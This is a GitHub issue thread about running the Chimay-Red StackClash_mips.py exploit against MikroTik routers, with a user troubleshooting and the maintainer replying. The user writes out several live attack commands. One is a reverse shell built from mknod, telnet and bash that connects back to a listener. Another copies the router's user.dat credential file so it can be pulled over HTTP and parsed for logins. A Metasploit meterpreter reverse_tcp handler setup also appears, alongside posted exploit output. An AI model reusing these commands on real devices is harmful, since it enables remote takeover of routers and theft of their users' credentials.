
shellcommand

Open halekan opened this issue 6 years ago • 8 comments

What shellcommand? How do I build it with Kali Linux to make it work fine?

/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Usage: ./StackClash_mips.py IP PORT binary shellcommand

How to get a reverse shell?

  1. First, prepare metasploit multi handler on your computer

use exploit/multi/handler
set payload linux/mipsbe/meterpreter/reverse_tcp
set LHOST YOUR IP
set LPORT YOUR LPORT
run

Where is the payload to send to the MikroTik, and how do I build it with msfvenom? We have only binary ???????

Can you explain?

halekan, Mar 06 '18 06:03

What is this?

/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Pseudo random command?

Please read the readme.md before opening issues: https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#reverse-shell

BigNerd95, Mar 06 '18 10:03

good

Read it fully. Test on RB750GL / MIPSBE / v6.37.1

$ nc -l -p 1234

root@test:~/Chimay# ./StackClash_mips.py 192.168.230.113 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.233.190 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

root@test:~/Chimay# ./StackClash_mips.py 192.168.233.190 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"

Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

Extract users: nothing happens

root@test:~/Chimay# curl -s http://192.168.233.190/winbox/index | ./tools/extract_user.py -

root@test:~/Chimay#

It is blank: no result, no user, no password.

halekan, Mar 07 '18 04:03

Does reverse shell work? When you run "extract user" do you close reverse shell before running the exploit?

BigNerd95, Mar 07 '18 05:03

$ nc -l -p 1234

no

halekan, Mar 07 '18 05:03

So you have to root your board and debug it. Sorry, but I can't test all versions for anyone. If you are able to fix it, then send a PR.

BigNerd95, Mar 07 '18 05:03

How do I root it? Give me steps one by one.

halekan, Mar 07 '18 06:03

Also a coffee?

Some links

https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup

https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0

Then read my pdf to install gdb-server

BigNerd95, Mar 07 '18 06:03

Nope

BigNerd95, Mar 07 '18 06:03